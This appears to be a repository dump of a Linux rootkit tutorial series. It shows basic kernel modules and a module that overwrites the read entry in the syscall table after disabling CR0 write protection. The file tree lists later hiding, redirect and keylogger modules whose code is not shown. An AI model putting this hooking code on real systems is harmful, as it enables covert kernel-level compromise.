├── .vscode └── settings.json ├── README.md ├── module01 ├── .vscode │ └── tasks.json ├── Makefile └── helloworld.c ├── module02 ├── .vscode │ └── tasks.json ├── Makefile └── helloworld.c ├── module03 ├── .vscode │ ├── ipch │ │ ├── 3a227f7b4ea1e547 │ │ │ ├── exit.ipch │ │ │ └── mmap_address.bin │ │ └── 97375d4bcec1856a │ │ │ ├── main.ipch │ │ │ └── mmap_address.bin │ └── tasks.json ├── Makefile ├── exit.c └── main.c ├── module04 ├── .vscode │ ├── ipch │ │ └── 81b6fce00c4f8bc1 │ │ │ └── mmap_address.bin │ └── tasks.json ├── Makefile ├── exit.c ├── foo ├── functs.h └── main.c ├── module05_hooking_sysread ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe ├── module06_hooking_sysopen ├── .cache.mk ├── .vscode │ └── tasks.json ├── Makefile ├── main.c ├── main.o.ur-safe └── testfile ├── module07_hooking_getdents ├── .vscode │ └── tasks.json ├── Makefile ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module08_hooking_getdents_hidePIDs ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module09_hooking_syscall_connect ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module10_hooking_syscall_connect_redirect ├── .vscode │ └── tasks.json ├── Echo.c ├── Makefile ├── echo ├── main.c ├── main.o.ur-safe ├── secretfile.txt └── testfile ├── module11_Hooking_execve ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe ├── module12_Hooking_execve_altercmd ├── .vscode │ └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe └── module13_Hooking_SyscallRead_Keylogger ├── .vscode └── tasks.json ├── Makefile ├── main.c └── main.o.ur-safe /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "unistd.h": "c", 4 | "module.h": "c", 5 | "stdio.h": "c", 6 | "stdlib.h": "c", 7 | "socket.h": "c", 8 | "in.h": "c", 9 | "audit.h": "c", 10 | "net.h": "c", 11 | "array": "c", 12 | "istream": "c", 13 | "ostream": "c", 14 | "tuple": "c", 15 | "type_traits": "c", 16 | "utility": "c" 17 | } 18 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # rootkitdev-linux 2 | This is a small series on rootkit development for Linux O.S 3 | 4 | 5 | Our definitions of syscalls come from here: 6 | https://github.com/torvalds/linux/blob/39bed42de2e7d74686a2d5a45638d6a5d7e7d473/include/linux/syscalls.h 7 | -------------------------------------------------------------------------------- /module01/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module01/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += helloworld.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | 9 | -------------------------------------------------------------------------------- /module01/helloworld.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | 5 | static int HelloInit(void){ 6 | 7 | printk(KERN_INFO "ROOTKITDEV_DEBUG: HELLO WORLD! \n"); 8 | return 0; 9 | } 10 | 11 | 12 | static void HelloExit(void){ 13 | 14 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 15 | 16 | 17 | } 18 | 19 | 20 | module_init(HelloInit); 21 | module_exit(HelloExit); 22 | 23 | MODULE_LICENSE("GPL"); -------------------------------------------------------------------------------- /module02/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module02/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += helloworld.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 8 | 9 | -------------------------------------------------------------------------------- /module02/helloworld.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | MODULE_LICENSE("GPL"); 9 | 10 | 11 | #define DRIVER_AUTHOR "SourceCodeDeleted" 12 | #define DRIVER_DESC "Some hello world param driver" 13 | MODULE_AUTHOR(DRIVER_AUTHOR); 14 | MODULE_DESCRIPTION(DRIVER_DESC); 15 | 16 | 17 | MODULE_SUPPORTED_DEVICE("testdevice"); 18 | 19 | 20 | static char *MyString = ""; 21 | module_param(MyString, charp, 0000); 22 | MODULE_PARM_DESC(MyString, "This is a string that gets echoed."); 23 | 24 | 25 | static int HelloInit(void){ 26 | 27 | printk(KERN_INFO "ROOTKITDEV_DEBUG: %s \n", MyString); 28 | return 0; 29 | } 30 | 31 | 32 | static void HelloExit(void){ 33 | 34 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 35 | 36 | 37 | } 38 | 39 | 40 | module_init(HelloInit); 41 | module_exit(HelloExit); 42 | 43 | -------------------------------------------------------------------------------- /module03/.vscode/ipch/3a227f7b4ea1e547/exit.ipch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/3a227f7b4ea1e547/exit.ipch -------------------------------------------------------------------------------- /module03/.vscode/ipch/3a227f7b4ea1e547/mmap_address.bin: -------------------------------------------------------------------------------- 1 | Xw -------------------------------------------------------------------------------- /module03/.vscode/ipch/97375d4bcec1856a/main.ipch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/97375d4bcec1856a/main.ipch -------------------------------------------------------------------------------- /module03/.vscode/ipch/97375d4bcec1856a/mmap_address.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module03/.vscode/ipch/97375d4bcec1856a/mmap_address.bin -------------------------------------------------------------------------------- /module03/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module03/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += kittyrootkit.o 2 | kittyrootkit-objs := main.o exit.o 3 | 4 | all: 5 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 6 | 7 | clean: 8 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 9 | 10 | -------------------------------------------------------------------------------- /module03/exit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | static void HelloExit(void){ 9 | 10 | printk(KERN_INFO "ROOTKITDEV_DEBUG : GOODBYE WORLD \n"); 11 | 12 | 13 | } 14 | 15 | 16 | module_exit(HelloExit); 17 | 18 | -------------------------------------------------------------------------------- /module03/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | 7 | 8 | MODULE_LICENSE("GPL"); 9 | 10 | #define DRIVER_AUTHOR "SourceCodeDeleted" 11 | #define DRIVER_DESC "Some hello world param driver" 12 | MODULE_AUTHOR(DRIVER_AUTHOR); 13 | MODULE_DESCRIPTION(DRIVER_DESC); 14 | 15 | 16 | //MODULE_SUPPORTED_DEVICE("testdevice"); 17 | 18 | 19 | static char *MyString = ""; 20 | module_param(MyString, charp, 0000); 21 | MODULE_PARM_DESC(MyString, "This is a string that gets echoed."); 22 | 23 | 24 | static int HelloInit(void){ 25 | 26 | printk(KERN_INFO "ROOTKITDEV_DEBUG: %s \n", MyString); 27 | return 0; 28 | } 29 | 30 | 31 | 32 | 33 | module_init(HelloInit); 34 | 35 | -------------------------------------------------------------------------------- /module04/.vscode/ipch/81b6fce00c4f8bc1/mmap_address.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module04/.vscode/ipch/81b6fce00c4f8bc1/mmap_address.bin -------------------------------------------------------------------------------- /module04/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module04/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o exit.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module04/exit.c: -------------------------------------------------------------------------------- 1 | #include "functs.h" 2 | 3 | 4 | 5 | static void UnLoadDriver(void){ 6 | 7 | unregister_chrdev(Major, DEVICE_NAME); 8 | printk(KERN_INFO "ROOTKITDEV_DEBUG : Driver Unloaded! \n"); 9 | 10 | } 11 | 12 | 13 | module_exit(UnLoadDriver); 14 | 15 | -------------------------------------------------------------------------------- /module04/foo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module04/foo -------------------------------------------------------------------------------- /module04/functs.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include // Debug messages 3 | #include //macros 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | 12 | int init_module(void); 13 | int device_open(struct inode * inode, struct file *file); 14 | int device_release(struct inode * inode, struct file *file); 15 | ssize_t device_read(struct file * file, char * buffer, size_t length, loff_t *offset); 16 | ssize_t device_write(struct file * file , const char * buffer, size_t length, loff_t *offset); 17 | 18 | #define SUCCESS 0 19 | #define DEVICE_NAME "rootkit" 20 | #define BUF_LEN 80 21 | extern int Major; -------------------------------------------------------------------------------- /module04/main.c: -------------------------------------------------------------------------------- 1 | #include "functs.h" 2 | 3 | 4 | 5 | MODULE_LICENSE("GPL"); 6 | 7 | #define DRIVER_AUTHOR "SourceCodeDeleted" 8 | #define DRIVER_DESC "Some hello world param driver" 9 | MODULE_AUTHOR(DRIVER_AUTHOR); 10 | MODULE_DESCRIPTION(DRIVER_DESC); 11 | 12 | int Major; 13 | static int Device_Open = 0; 14 | static char msg[BUF_LEN]={0}; 15 | static char *msg_Ptr; 16 | 17 | static struct file_operations fops = { 18 | .read = device_read, 19 | .write = device_write, 20 | .open = device_open, 21 | .release = device_release 22 | }; 23 | 24 | 25 | 26 | //init _module functions 27 | 28 | int init_module(void){ 29 | 30 | Major = register_chrdev(0, DEVICE_NAME, &fops); 31 | 32 | if (Major < 0){ 33 | printk(KERN_ALERT "I have failed to load!\n"); 34 | return Major; 35 | } 36 | 37 | printk (KERN_ALERT "I was assigned major number %d\n" , Major); 38 | printk (KERN_ALERT "Please create device with name \n mknod /dev/%s c %d 0 \n" ,DEVICE_NAME , Major ); 39 | return 0; 40 | 41 | 42 | } 43 | 44 | 45 | int device_open(struct inode * inode, struct file *file){ 46 | 47 | //static int counter = 0; 48 | if (Device_Open){ 49 | return -EBUSY; 50 | 51 | } 52 | Device_Open++; 53 | 54 | //sprintf(msg, "Good morning Dave, I was opened %d times", counter++); 55 | msg_Ptr = msg; 56 | try_module_get(THIS_MODULE); 57 | return 0; 58 | } 59 | 60 | 61 | 62 | int device_release(struct inode * inode, struct file *file){ 63 | Device_Open--; 64 | 65 | module_put(THIS_MODULE); 66 | return 0; 67 | } 68 | 69 | 70 | ssize_t device_read(struct file * file, char * buffer, size_t length, loff_t *offset){ 71 | int bytes_read = 0; 72 | if(*msg_Ptr == 0){ 73 | return 0; 74 | } 75 | 76 | while(length && *msg_Ptr){ 77 | put_user(* (msg_Ptr++), buffer++ ); 78 | length--; 79 | bytes_read++; 80 | } 81 | return bytes_read; 82 | 83 | 84 | 85 | } 86 | 87 | 88 | 89 | ssize_t device_write(struct file * file , const char * buffer, size_t length, loff_t *offset){ 90 | 91 | int count = 0; 92 | memset (msg, 0, BUF_LEN); 93 | 94 | while(length > 0){ 95 | copy_from_user(msg, buffer, BUF_LEN-1); 96 | count ++; 97 | length--; 98 | msg[BUF_LEN-1] = 0x00; 99 | 100 | 101 | } 102 | 103 | return count; /*ALWAYE RETURN SOMETHING!*/ 104 | 105 | } 106 | 107 | -------------------------------------------------------------------------------- /module05_hooking_sysread/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module05_hooking_sysread/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module05_hooking_sysread/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | MODULE_LICENSE("GPL"); 13 | MODULE_AUTHOR("SourceCodeDeleted"); 14 | MODULE_DESCRIPTION("Simple Hooking Of a Read Syscall"); 15 | MODULE_VERSION("1.0"); 16 | 17 | 18 | unsigned long **SYS_CALL_TABLE; 19 | 20 | 21 | 22 | 23 | 24 | void EnablePageWriting(void){ 25 | write_cr0(read_cr0() & (~0x10000)); 26 | 27 | } 28 | void DisablePageWriting(void){ 29 | write_cr0(read_cr0() | 0x10000); 30 | 31 | } 32 | 33 | 34 | 35 | asmlinkage int (*original_read)(unsigned int, void __user*, size_t); 36 | asmlinkage int HookRead(unsigned int fd, void __user* buf, size_t count) { 37 | //printk(KERN_INFO "READ HOOKED HERE! -- This is our function!"); 38 | return (*original_read)(fd, buf, count); 39 | } 40 | 41 | 42 | 43 | 44 | 45 | 46 | static int __init SetHooks(void) { 47 | // Gets Syscall Table ** 48 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 49 | 50 | printk(KERN_INFO "Hooks Will Be Set.\n"); 51 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 52 | 53 | 54 | EnablePageWriting(); 55 | 56 | // Replaces Pointer Of Syscall_read on our syscall. 57 | original_read = (void*)SYS_CALL_TABLE[__NR_read]; 58 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)HookRead; 59 | DisablePageWriting(); 60 | 61 | return 0; 62 | } 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | static void __exit HookCleanup(void) { 71 | 72 | // Clean up our Hooks 73 | EnablePageWriting(); 74 | SYS_CALL_TABLE[__NR_read] = (unsigned long*)original_read; 75 | DisablePageWriting(); 76 | 77 | printk(KERN_INFO "HooksCleaned Up!"); 78 | } 79 | 80 | module_init(SetHooks); 81 | module_exit(HookCleanup); -------------------------------------------------------------------------------- /module05_hooking_sysread/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-38 2 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-48 3 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-69 4 | /home/krash/works/rootkitdev/module05_hooking_sysread/main.o-.text-79 5 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/.cache.mk: -------------------------------------------------------------------------------- 1 | __cached_gcc_-v_2>&1_|_grep_-q_"clang_version"_&&_echo_clang_||_echo_gcc := gcc 2 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mretpoline-external-thunk_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mretpoline-external-thunk";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 3 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-extern_-mindirect-branch-register_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mindirect-branch_thunk-extern_-mindirect-branch-register";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mindirect-branch=thunk-extern -mindirect-branch-register 4 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mretpoline_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mretpoline";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 5 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-mindirect-branch_thunk-inline_-mindirect-branch-register_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mindirect-branch_thunk-inline_-mindirect-branch-register";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mindirect-branch=thunk-inline -mindirect-branch-register 6 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-PIE";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-PIE 7 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-fno-PIE_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-PIE";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-PIE 8 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-maybe-uninitialized";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-maybe-uninitialized 9 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE__-mpreferred-stack-boundary_4_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mpreferred-stack-boundary_4";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=4 10 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE__-m16_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-m16";_else_echo_"_-m32_-Wa_./arch/x86/boot/code16gcc.h";_fi;_rm_-f_"_TMP"_"_TMPO" := -m16 11 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse__-ffreestanding_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-ffreestanding";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -ffreestanding 12 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding__-fno-stack-protector_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-fno-stack-protector";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-stack-protector 13 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding_-fno-stack-protector__-Wno-address-of-packed-member_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-Wno-address-of-packed-member";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-address-of-packed-member 14 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-m16_-g_-Os_-D__KERNEL___-DDISABLE_BRANCH_PROFILING_-Wall_-Wstrict-prototypes_-march_i386_-mregparm_3_-fno-strict-aliasing_-fomit-frame-pointer_-fno-pic_-mno-mmx_-mno-sse_-ffreestanding_-fno-stack-protector_-Wno-address-of-packed-member__-mpreferred-stack-boundary_2_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mpreferred-stack-boundary_2";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=2 15 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-avx";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-avx 16 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-falign-jumps_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -falign-jumps=1 17 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-falign-loops_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -falign-loops=1 18 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-80387";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-80387 19 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mno-fp-ret-in-387";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mno-fp-ret-in-387 20 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mpreferred-stack-boundary_3";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mpreferred-stack-boundary=3 21 | 